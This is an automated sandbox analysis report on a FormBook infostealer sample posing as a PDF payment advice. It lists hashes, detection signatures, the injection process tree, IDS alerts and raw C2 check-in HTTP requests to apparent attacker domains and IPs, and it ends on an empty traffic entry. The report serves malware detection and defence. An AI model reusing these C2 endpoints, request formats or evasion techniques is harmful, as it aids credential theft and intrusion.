
Windows Analysis Report
rPaymentAdviceNote_pdf.exe

Overview

General Information

Sample name: rPaymentAdviceNote_pdf.exe
Analysis ID: 1569491
MD5: c05461f24e430ecaf9b9106de5cafa70
SHA1: fc9e05b0c90db7a9f782908664d11fa2144abaed
SHA256: ce0b1bf28e5d0fc774caafecde07534057e36df193dc2ea9599e256a0b2f4a2c
Tags: exe, Formbook, user-Porcupine

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for reading data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • rPaymentAdviceNote_pdf.exe (PID: 7140 cmdline: "C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe" MD5: C05461F24E430ECAF9B9106DE5CAFA70)
    • svchost.exe (PID: 1020 cmdline: "C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • lDBisuvfBkK.exe (PID: 7000 cmdline: "C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • rasautou.exe (PID: 2172 cmdline: "C:\Windows\SysWOW64\rasautou.exe" MD5: DFDBEDC2ED47CBABC13CCC64E97868F3)
          • lDBisuvfBkK.exe (PID: 6992 cmdline: "C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 3020 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
0000000A.00000002.3093757528.00000000041C0000.00000040.00000001.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000008.00000002.1448964274.0000000006B20000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000008.00000002.1445662194.0000000000400000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000000B.00000002.3091105288.0000000002A40000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000000D.00000002.3096255257.0000000005030000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
(3 further memory-dump entries are not expanded in the report)

Source | Rule | Description | Author | Strings
8.2.svchost.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
8.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

                System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe", CommandLine: "C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe", ParentImage: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe, ParentProcessId: 7140, ParentProcessName: rPaymentAdviceNote_pdf.exe, ProcessCommandLine: "C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe", ProcessId: 1020, ProcessName: svchost.exe
Source: Process started; Author: vburov; Data: Command: "C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe", CommandLine: "C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe", ParentImage: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe, ParentProcessId: 7140, ParentProcessName: rPaymentAdviceNote_pdf.exe, ProcessCommandLine: "C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe", ProcessId: 1020, ProcessName: svchost.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-05T19:39:33.610591+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.7 | 49753 | 104.21.77.71 | 80 | TCP
2024-12-05T19:39:58.567032+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.7 | 49814 | 13.248.221.243 | 80 | TCP
2024-12-05T19:40:14.756618+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.7 | 49852 | 163.44.185.183 | 80 | TCP
2024-12-05T19:41:08.348736+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.7 | 49892 | 104.21.41.74 | 80 | TCP
2024-12-05T19:41:23.933756+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.7 | 49987 | 85.159.66.93 | 80 | TCP
2024-12-05T19:41:39.431492+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.7 | 49991 | 103.21.221.4 | 80 | TCP
2024-12-05T19:41:54.185382+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.7 | 49995 | 104.21.62.184 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-05T19:39:50.538723+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49790 | 13.248.221.243 | 80 | TCP
2024-12-05T19:39:53.202380+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49800 | 13.248.221.243 | 80 | TCP
2024-12-05T19:39:55.875039+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49806 | 13.248.221.243 | 80 | TCP
2024-12-05T19:40:06.746206+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49834 | 163.44.185.183 | 80 | TCP
2024-12-05T19:40:09.421842+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49840 | 163.44.185.183 | 80 | TCP
2024-12-05T19:40:12.187654+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49846 | 163.44.185.183 | 80 | TCP
2024-12-05T19:40:21.936562+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49872 | 104.21.41.74 | 80 | TCP
2024-12-05T19:40:24.608338+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49880 | 104.21.41.74 | 80 | TCP
2024-12-05T19:40:27.264616+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49886 | 104.21.41.74 | 80 | TCP
2024-12-05T19:41:16.108628+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49984 | 85.159.66.93 | 80 | TCP
2024-12-05T19:41:18.770881+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49985 | 85.159.66.93 | 80 | TCP
2024-12-05T19:41:21.436794+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49986 | 85.159.66.93 | 80 | TCP
2024-12-05T19:41:31.389983+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49988 | 103.21.221.4 | 80 | TCP
2024-12-05T19:41:34.061876+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49989 | 103.21.221.4 | 80 | TCP
2024-12-05T19:41:36.718050+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49990 | 103.21.221.4 | 80 | TCP
2024-12-05T19:41:46.204411+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49992 | 104.21.62.184 | 80 | TCP
2024-12-05T19:41:48.859135+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49993 | 104.21.62.184 | 80 | TCP
2024-12-05T19:41:51.521368+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49994 | 104.21.62.184 | 80 | TCP
2024-12-05T19:42:01.171722+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49996 | 66.29.137.10 | 80 | TCP
2024-12-05T19:42:03.802758+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49997 | 66.29.137.10 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-05T19:39:50.538723+0100 | 2856318 | 1 | A Network Trojan was detected | 192.168.2.7 | 49790 | 13.248.221.243 | 80 | TCP


                AV Detection

Source: rPaymentAdviceNote_pdf.exe; ReversingLabs: Detection: 34%
Source: Yara match; File source: 8.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 8.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0000000A.00000002.3093757528.00000000041C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000008.00000002.1448964274.0000000006B20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000008.00000002.1445662194.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000B.00000002.3091105288.0000000002A40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000D.00000002.3096255257.0000000005030000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000008.00000002.1446968619.0000000004FA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000B.00000002.3093726218.0000000004730000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000B.00000002.3093625342.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
Source: rPaymentAdviceNote_pdf.exe; Joe Sandbox ML: detected
Source: rPaymentAdviceNote_pdf.exe; Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: lDBisuvfBkK.exe, 0000000A.00000002.3091104280.0000000000BCE000.00000002.00000001.01000000.00000005.sdmp, lDBisuvfBkK.exe, 0000000D.00000002.3093155257.0000000000BCE000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: rPaymentAdviceNote_pdf.exe, 00000000.00000003.1279362794.0000000004190000.00000004.00001000.00020000.00000000.sdmp, rPaymentAdviceNote_pdf.exe, 00000000.00000003.1280888739.0000000004040000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.1446460401.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1352518601.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.1446460401.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1354325198.0000000003600000.00000004.00000020.00020000.00000000.sdmp, rasautou.exe, 0000000B.00000003.1452661667.0000000004777000.00000004.00000020.00020000.00000000.sdmp, rasautou.exe, 0000000B.00000002.3093982408.0000000004920000.00000040.00001000.00020000.00000000.sdmp, rasautou.exe, 0000000B.00000002.3093982408.0000000004ABE000.00000040.00001000.00020000.00000000.sdmp, rasautou.exe, 0000000B.00000003.1450087582.00000000045C1000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: rPaymentAdviceNote_pdf.exe, 00000000.00000003.1279362794.0000000004190000.00000004.00001000.00020000.00000000.sdmp, rPaymentAdviceNote_pdf.exe, 00000000.00000003.1280888739.0000000004040000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000008.00000002.1446460401.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1352518601.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.1446460401.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1354325198.0000000003600000.00000004.00000020.00020000.00000000.sdmp, rasautou.exe, rasautou.exe, 0000000B.00000003.1452661667.0000000004777000.00000004.00000020.00020000.00000000.sdmp, rasautou.exe, 0000000B.00000002.3093982408.0000000004920000.00000040.00001000.00020000.00000000.sdmp, rasautou.exe, 0000000B.00000002.3093982408.0000000004ABE000.00000040.00001000.00020000.00000000.sdmp, rasautou.exe, 0000000B.00000003.1450087582.00000000045C1000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: rasautou.exe, 0000000B.00000002.3091557163.0000000002CB7000.00000004.00000020.00020000.00000000.sdmp, rasautou.exe, 0000000B.00000002.3095003763.0000000004F4C000.00000004.10000000.00040000.00000000.sdmp, lDBisuvfBkK.exe, 0000000D.00000000.1520703069.0000000002BFC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000F.00000002.1747520200.000000000C7EC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: rasautou.exe, 0000000B.00000002.3091557163.0000000002CB7000.00000004.00000020.00020000.00000000.sdmp, rasautou.exe, 0000000B.00000002.3095003763.0000000004F4C000.00000004.10000000.00040000.00000000.sdmp, lDBisuvfBkK.exe, 0000000D.00000000.1520703069.0000000002BFC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000F.00000002.1747520200.000000000C7EC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: rasautou.pdbGCTL source: svchost.exe, 00000008.00000002.1446198845.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1411118102.0000000003213000.00000004.00000020.00020000.00000000.sdmp, lDBisuvfBkK.exe, 0000000A.00000003.1381282977.000000000107B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: rasautou.pdb source: svchost.exe, 00000008.00000002.1446198845.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1411118102.0000000003213000.00000004.00000020.00020000.00000000.sdmp, lDBisuvfBkK.exe, 0000000A.00000003.1381282977.000000000107B000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe; Code function: 0_2_008A445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_008A445A
Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe; Code function: 0_2_008AC6D1 FindFirstFileW,FindClose,0_2_008AC6D1
Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe; Code function: 0_2_008AC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_008AC75C
Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe; Code function: 0_2_008AEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_008AEF95
Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe; Code function: 0_2_008AF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_008AF0F2
Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe; Code function: 0_2_008AF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_008AF3F3
Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe; Code function: 0_2_008A37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_008A37EF
Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe; Code function: 0_2_008A3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_008A3B12
Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe; Code function: 0_2_008ABCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_008ABCBC
Source: C:\Windows\SysWOW64\rasautou.exe; Code function: 11_2_02A5CC00 FindFirstFileW,FindNextFileW,FindClose,11_2_02A5CC00
Source: C:\Windows\SysWOW64\rasautou.exe; Code function: 4x nop then xor eax, eax 11_2_02A4A080
Source: C:\Windows\SysWOW64\rasautou.exe; Code function: 4x nop then pop edi 11_2_02A4E774
Source: C:\Windows\SysWOW64\rasautou.exe; Code function: 4x nop then mov ebx, 00000004h 11_2_048304D8

                Networking

Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49753 -> 104.21.77.71:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49790 -> 13.248.221.243:80
Source: Network traffic; Suricata IDS: 2856318 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M4 : 192.168.2.7:49790 -> 13.248.221.243:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49800 -> 13.248.221.243:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49814 -> 13.248.221.243:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49846 -> 163.44.185.183:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49852 -> 163.44.185.183:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49834 -> 163.44.185.183:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49872 -> 104.21.41.74:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49840 -> 163.44.185.183:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49880 -> 104.21.41.74:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49886 -> 104.21.41.74:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49806 -> 13.248.221.243:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49892 -> 104.21.41.74:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49984 -> 85.159.66.93:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49995 -> 104.21.62.184:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49991 -> 103.21.221.4:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49990 -> 103.21.221.4:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49985 -> 85.159.66.93:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49989 -> 103.21.221.4:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49986 -> 85.159.66.93:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49992 -> 104.21.62.184:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49988 -> 103.21.221.4:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49993 -> 104.21.62.184:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49987 -> 85.159.66.93:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49997 -> 66.29.137.10:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49996 -> 66.29.137.10:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49994 -> 104.21.62.184:80
                Source: DNS query: www.aziziyeescortg.xyz
Source: Joe Sandbox View; IP Address: 103.21.221.4
Source: Joe Sandbox View; IP Address: 163.44.185.183
Source: Joe Sandbox View; ASN Name: LINKNET-ID-APLinknetASNID
Source: Joe Sandbox View; ASN Name: CLOUDFLARENETUS
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1 (reported 10 times)
Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe; Code function: 0_2_008B22EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_008B22EE
Source: global traffic; HTTP traffic detected:
    GET /wbcb/?wVb0=RE7vYLyK5TU4QOP5rF5bzHvmkOBzPkLWFqcdQsIlKut3OUPHwC3RgbbGtWJhBdiGOnYKFKB5mJuPEPmtM8O0K3O6A/B6pmA5xGmAOUvp0kuEyHznIJjgzI6sNmSk1vDMl2v3exemO24i&0r=XzjtrBPP HTTP/1.1
    Host: www.aziziyeescortg.xyz
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.9
    Connection: close
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
Source: global traffic; HTTP traffic detected:
    GET /5rfk/?wVb0=sD5zUlt3wbrvSr53X/LgfhW+OptFCrWooNx2zE35RlOZ6Ff5bUgKRp+BgbOlYXfZZMl91myXHSHWgEoZCPkWwkB1wGODpj+x1UAb80+hCsFXkgAnUr413w2hk7wj/03GtdXjGHp26G6Z&0r=XzjtrBPP HTTP/1.1
    Host: www.grandesofertas.fun
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.9
    Connection: close
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
Source: global traffic; HTTP traffic detected:
    GET /21k5/?wVb0=fWbmkZjyrmfBp888CcG5P/tv6YAygrCJWn0G2JrBW+aKnevZKbpm6U1ITTXCtKXlDFd/bcpJLIqCcWUwrjM1A4LwPHwyvUagu3NR6s+1WMK3FQ8gyne1SqlHaV7MI3WrY5r02MQ5JkbW&0r=XzjtrBPP HTTP/1.1
    Host: www.sankan-fukushi.info
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.9
    Connection: close
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
Source: global traffic; HTTP traffic detected:
    GET /m7wz/?wVb0=k3rxT2/5CoW37253fqeJ2GQ6srVb5CIz6HeAuhy5mTu7sK1SIq+qIwOPP+2nE63N1XqW2uYy0GjlFOwlbRaUhItXSR0DNFdPvSJbxiH35Vlkry1kHcbP6o4IkfKAx2mWTolkC1NZH4oP&0r=XzjtrBPP HTTP/1.1
    Host: www.conansog.shop
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.9
    Connection: close
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
Source: global traffic; HTTP traffic detected:
    GET /80gy/?wVb0=aoPUcaSQDoEYl3Li+4Czyu/3g+fbTJot1NLErCBtTlAsQjsNV1cN7WJnCGjlbK4CrVmsUH1zx16cR6YNnzS2sPuaP2IeA1YIjk+zZLMvVudzffalj3pTsEAkrCqDu4c/9ECDd62vUbZW&0r=XzjtrBPP HTTP/1.1
    Host: www.beythome.online
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.9
    Connection: close
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
Source: global traffic; HTTP traffic detected:
    GET /0kli/?wVb0=Fegsvl+OGDJHKeUkviVqrWXmfitRVJjJzbj1DgnmRmeFZ5KITSJ35O+CNkAnveOy+X8wGwFlf4nSYcZPMr6/ALB9HdTqqkiH2QBnBPtm52OUHeYVRkXu0orA8o5vf7k6+C2EbfsSUCNF&0r=XzjtrBPP HTTP/1.1
    Host: www.tempatmudisini06.click
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.9
    Connection: close
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
Source: global traffic; HTTP traffic detected:
